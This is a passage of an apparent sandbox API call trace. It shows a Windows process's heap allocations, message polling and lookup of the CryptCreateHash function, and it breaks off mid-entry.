[0246.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.730] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0246.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0246.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0246.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.732] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.732] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0246.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0246.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.732] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0246.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0246.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0246.732] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0246.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0246.733] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0246.733] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f48 [0246.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.733] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0246.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0246.733] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.734] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0246.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.734] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0246.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56060 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0246.734] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56060 | out: hHeap=0x970000) returned 1 [0246.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.734] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0246.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0246.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0246.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0246.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0246.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0246.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0246.736] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0246.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0246.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.737] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0246.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0246.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0246.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0246.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0246.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0246.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0246.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0246.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0246.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0246.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0246.738] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0246.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0246.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0246.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0246.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0246.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0246.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0246.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e515b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0246.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0246.741] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0246.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0246.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0246.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0246.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0246.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0246.741] HeapFree 